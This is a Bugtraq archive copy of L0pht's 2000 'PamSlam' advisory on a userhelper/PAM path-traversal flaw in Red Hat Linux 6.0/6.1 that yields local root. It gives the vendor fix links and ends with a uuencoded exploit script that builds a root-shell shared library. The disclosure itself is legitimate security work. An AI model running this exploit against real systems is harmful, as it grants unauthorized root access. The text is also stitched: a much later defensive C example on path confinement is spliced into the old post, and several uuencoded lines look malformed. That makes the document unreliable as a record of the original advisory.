Bugtraq Archives: L0pht Advisory: RH Linux 6.0/6.1, PAM and use

L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper


Subject: L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper
From: Dildog (dildog@L0PHT.COM)
Date: Tue Jan 04 2000 - 19:09:05 CST


                       L0pht Security Advisory

        Advisory Name: PamSlam
    Advisory Released: [01/04/00]
          Application: userhelper and PAM on Redhat Linux 6.0/6.1
             Severity: A local user can gain root access.
               Status: Vendor contacted. Fix provided by vendor.
                       Advisory released.
               Author: dildog@l0pht.com
                  WWW: http://www.l0pht.com/advisories.html

Overview:

         Both 'pam' and 'userhelper' (a setuid binary that comes with the
'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
_pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
being setuid means we can get root.

Description:

        Because both userhelper and PAM follow .. paths, we can craft a file
that causes userhelper (by way of PAM) to dlopen any shared object we want as
root. The exploit is simple, and uses the '-w' option of userhelper, which lets
us specify a program to run with the privileges designated by PAM. userhelper
tries to execute only programs that have entries in
/etc/security/console.apps, but since we get to specify the name, something
like ../../../tmp/myprog gives us a file open path that looks like
/etc/security/console.apps/../../../tmp/myprog. "strcat" is not a good way to
keep a filename below a directory!

        After this hurdle, PAM is called to start up the binary, and it does
the same thing, looking for a service file of that name in /etc/pam.d. If we've
placed a rogue pam.d configuration file in /tmp/myprog, PAM can be pointed at
/etc/pam.d/../../../tmp/myprog. In the pam.d configuration file, we get to pick
a few shared libraries to dlopen, so at this point we get root.
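The two paragraphs above describe the same defect twice: a caller-chosen name is glued onto a fixed directory with strcat, and the ".." components walk back out of it. The following C program is an added illustration, not code from L0pht, userhelper, PAM or Red Hat, and it does not claim to be the vendor's fix. It builds the advisory's own two paths, shows what the strcat pattern produces, and contrasts it with two defensive checks: restricting the name to a single path component, and lexically collapsing ".." so a path can be compared against the directory it must stay below. The directory names and the "myprog" sample are taken from the advisory; the function names are the example's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Directories named in the advisory, used here as constructed sample inputs. */
#define CONSOLE_APPS_DIR "/etc/security/console.apps"
#define PAM_CONF_DIR     "/etc/pam.d"

/* The pattern the advisory criticises: directory + "/" + caller-chosen name
 * glued together with strcat. A name such as "../../../tmp/myprog" is
 * accepted unchanged. Returns 0 on success, -1 if out is too small. */
int naive_join(const char *dir, const char *name, char *out, size_t outlen)
{
    if (strlen(dir) + 1 + strlen(name) + 1 > outlen)
        return -1;
    strcpy(out, dir);
    strcat(out, "/");
    strcat(out, name);          /* no check for '/' or ".." in name */
    return 0;
}

/* Hardened variant: the name must be exactly one path component drawn from
 * a conservative character set, so the result can only ever name an entry
 * directly below dir. Returns 0 and fills out, or -1 if the name is rejected. */
int confined_join(const char *dir, const char *name, char *out, size_t outlen)
{
    size_t n = strlen(name);
    if (n == 0 || n > 64)
        return -1;                                  /* empty or absurdly long */
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return -1;                                  /* current/parent directory */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '-' || c == '_' || c == '.'))
            return -1;                              /* '/' and anything odd */
    }
    return naive_join(dir, name, out, outlen);      /* now a single component */
}

/* Collapse "." and ".." components of an absolute path lexically, without
 * touching the filesystem (symlinks are not resolved; realpath(3) does that
 * once the file exists). Output has no trailing slash except for "/".
 * Returns 0, or -1 if path is not absolute or out is too small. */
int lexical_normalize(const char *path, char *out, size_t outlen)
{
    if (path[0] != '/' || outlen < 2)
        return -1;
    size_t len = 1;
    out[0] = '/';
    const char *p = path;
    while (*p) {
        while (*p == '/')
            p++;                                    /* skip runs of slashes */
        if (*p == '\0')
            break;
        const char *start = p;
        while (*p && *p != '/')
            p++;
        size_t clen = (size_t)(p - start);
        if (clen == 1 && start[0] == '.')
            continue;                               /* "." is a no-op */
        if (clen == 2 && start[0] == '.' && start[1] == '.') {
            while (len > 1 && out[len - 1] != '/')  /* pop the last component */
                len--;
            if (len > 1)
                len--;                              /* and its leading '/' */
            continue;                               /* "/.." stays at "/" */
        }
        size_t need = len + (len > 1 ? 1 : 0) + clen + 1;
        if (need > outlen)
            return -1;
        if (len > 1)
            out[len++] = '/';
        memcpy(out + len, start, clen);
        len += clen;
    }
    out[len] = '\0';
    return 0;
}

/* 1 if path, once normalised, lies strictly below base (base given in
 * normalised form, no trailing slash); 0 otherwise or on error. */
int path_stays_below(const char *base, const char *path)
{
    char norm[1024];
    size_t blen = strlen(base);
    if (lexical_normalize(path, norm, sizeof norm) != 0)
        return 0;
    return strncmp(norm, base, blen) == 0 && norm[blen] == '/';
}

int main(void)
{
    char buf[256];
    const char *name = "../../../tmp/myprog";        /* the advisory's name */
    const char *pamfile = "/etc/pam.d/../../../tmp/myprog";

    naive_join(CONSOLE_APPS_DIR, name, buf, sizeof buf);
    printf("strcat join:   %s\n", buf);
    printf("confined join: %s\n",
           confined_join(CONSOLE_APPS_DIR, name, buf, sizeof buf) == 0 ? buf : "rejected");
    lexical_normalize(pamfile, buf, sizeof buf);
    printf("%s normalises to %s, below %s: %s\n", pamfile, buf, PAM_CONF_DIR,
           path_stays_below(PAM_CONF_DIR, pamfile) ? "yes" : "no");
    return 0;
}
```

The single-component rule is the stronger of the two checks and is what a service-name lookup like this one needs; the lexical normalisation is useful when a caller legitimately supplies a path, but note that it does not see symlinks, so a real implementation should still open the file relative to the base directory (or compare against realpath(3)) rather than trusting the string alone.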

The following exploit demonstrates this vulnerability by creating a
'rootshell library' that creates a shell when dlopened, creating a pam.d-style
configuration file, and then running userhelper with the appropriately dotted
path.

Quick solution:

        Download the fix from Red Hat at:

   Red Hat Linux 6.1:

   Intel:
   ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
   ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm

   Alpha:
   ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
   ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm

   Sparc:
   ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
   ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm

   Source packages:
   ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
   ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm

   Red Hat Linux 6.0:

   Intel:
   ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
   ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
   ftp://updates.redhat.com/6.0/i386/SysVinit-2.77-2.i386.rpm

   Alpha:
   ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
   ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
   ftp://updates.redhat.com/6.0/alpha/SysVinit-2.77-2.alpha.rpm

   Sparc:
   ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
   ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
   ftp://updates.redhat.com/6.0/sparc/SysVinit-2.77-2.sparc.rpm

   Source packages:
   ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
   ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
   ftp://updates.redhat.com/6.0/SRPMS/SysVinit-2.77-2.src.rpm
        
Exploit:

Uudecode the following script. Run the script.

begin 755 pamslam.sh
M(R$O8FEN+W-H"B,*(R!P86US;&%M("T=G5L;F5R86)I;&ET>2!I;B!2961H
M8703&EN=7-BXQ(&%N9"!004T<&%M7W-T87)T"B,9F]U;F08GD9&EL
M9&]G0&PP<&AT+F-O;0HC("`*(R!S>6YO<'-I<SH*(R`("!B;W1H("=P86TG
M(&%N9"`G=7-E<FAE;'!E<B<*&$<V5T=6ED(&)I;F%R>2!T:&%T(&-O;65S
M('=I=&=&AE"B,("`)W5S97)M;V1E+3$N,34G(')P;2D9F]L;&]W("XN
M('!A=&AS+B!3:6YC92!P86U?<W1A<G08V%L;',9&]W;B!T;PHC("`(%]P
M86U?861D7VAA;F1L97(H*2P=V48V%N(&=E="!I="!T;R!D;&]P96X86YY
M(&9I;&4;VX9&ES:RX)W5S97)H96QP97(G"B,("`8F5I;F<<V5T=6ED
M(&UE86YS('=E(&-A;B!G970<F]O="X"B,*(R!F:7Z(`HC("`($YO(&9U
M8VMI;B!I9&5A(&9O<B!A(&=O;V09FEX+B!'970<FED(&]F('1H92`N+B!P
M871H<R!I;B!U<V5R:&5L<&5R(`HC("`(&9O<B!A('%U:6-K(&9I>"X4F5M
M96UB97()W-T<F-A="<:7-N)W082!V97)Y(&=O;V0=V%Y(&]F(&-O;F9I
M;FEN9PHC("`(&$<&%T:"!T;R!A('!A<G1I8W5L87(<W5B9&ER96-T;W)Y
M+HC"B,<')O<',=&\;7D;6]M;7D86YD(&1A9&1Y+"!C=7H=&AE>2!M
M861E(&UE(&1R:6YK(&UY(&UI;&LN"IC870/B!?<&%M<VQA;2YC(#P\($5/
M1HC:6YC;'5D93QS=&1L:6(N:#X*(VEN8VQU9&4\=6YI<W1D+F^"B-I;F-L
M=61E/'-Y<R]T>7!E<RYH/IV;VED(%]I;FET*'9O:60I"GL*("`('-E='5I
M9"AG971E=6ED*"DI.PH("`<WES=&5M*"(O8FEN+W-H(BD["GT*14]&"IE
M8VAO("UN("X*"F5C:&\+64875T:%Q<=')E<75I<F5D7%QT)%!71"]?<&%M
M<VQA;2YS;R`^(%]P86US;&%M+F-O;F8*8VAM;V0-S4U(%]P86US;&%M+F-O
M;F8*"F5C:&\+6X+H*9V-C("UF4$E#("UO(%]P86US;&%M+F\+6,7W!A
M;7-L86TN8PH*96-H;R`M;B!O"IL9"`M<VAA<F5D("UO(%]P86US;&%M+G-O
M(%]P86US;&%M+F\*"F5C:&\+6X;PH*8VAM;V0-S4U(%]P86US;&%M+G-O
M"IE8VAO("UN($\*"G)M(%]P86US;&%M+F,*<FT7W!A;7-L86TN;PH*96-H
M;R!/"HO=7-R+W-B:6XO=7-E<FAE;'!E<B`M=R`N+B\N+B\N+B105T0O7W!A
M;7-L86TN8V]N9H*<VQE97`,7,*"G)M(%]P86US;&%M+G-O"G)M(%]P86US
*;&%M+F-O;F8*"``
`
end

Boing.

dildog@l0pht.com

  [ For more advisories check out http://www.l0pht.com/advisories.html ]
